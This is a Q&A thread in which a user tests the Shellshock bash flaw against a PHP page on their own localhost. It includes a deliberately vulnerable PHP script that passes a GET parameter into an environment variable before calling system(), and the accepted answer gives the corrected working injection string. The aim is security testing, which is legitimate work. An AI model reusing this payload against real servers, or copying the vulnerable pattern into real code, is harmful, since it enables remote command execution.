# Testing shellshock with PHP

Tags: linux, php, shellshock

I have been trying to test shellshock vulnerability on PHP similar to this [answer](https://security.stackexchange.com/a/68610/42517). I am running Apache server with PHP running as mod_php. The PHP version is 5.3.10.

I have a phpfile (phptest.php):

```
<?php

  function getLang() 
  { 
    if (isset($_GET["lang"]) && !empty($_GET["lang"])) 
    { 
      $lang = $_GET["lang"]; 
    } 
    return $lang; 
  } 
  $language = getLang(); 
  putenv("LANGUAGE=$language");

  system("env | grep LANGUAGE");

 ?>
```

I tried to access the page via the browser as follows:

```
localhost/phptest.php?lang=(){:;}; /bin/ping http://localhost
```

In the linked question, the wget is to the dev's IP, but I just decided to do a ping to see I can test it.

The browser shows the output as follows:

```
LANGUAGE=(){:;}; /bin/ping http://localhost
```

I tried to monitor the ping using the following (from this [question](https://serverfault.com/q/448541/97488)):

```
 sudo tcpdump -i lo icmp and icmp[icmptype]=icmp-echo
```

I didn't see any request. Can someone tell what do I need correct in my test ?

Comment: Try ping 127.0.0.1 instead.

Answer (score 1, accepted):

I figured out the problem. Changing to `/bin/ping 127.0.0.1` did help, but there was another subtle change to be made.

There needs to be one space between `)` & `{`, and another space between `{` & `:`. The revised request was:

```
localhost/phptest.php?lang=() { :;}; /bin/ping 127.0.0.1
```

Source for answer was this [link](http://www.securitysift.com/shellshock-targeting-non-cgi-php/).

Answer (score 1):

Asuming that this injection basicly works:

```
localhost/phptest.php?lang=(){:;}; /bin/ping http://localhost
```

Your problem is related to the command you try to inject. Ping accepts a hostname as a parameter. But you injected http://localhost as a parameter which is a url and cant be accepted by the ping command. It must be `ping localhost` instead of `ping http://localhost`.

Comment: Nope it didn't work. I will check the injection again.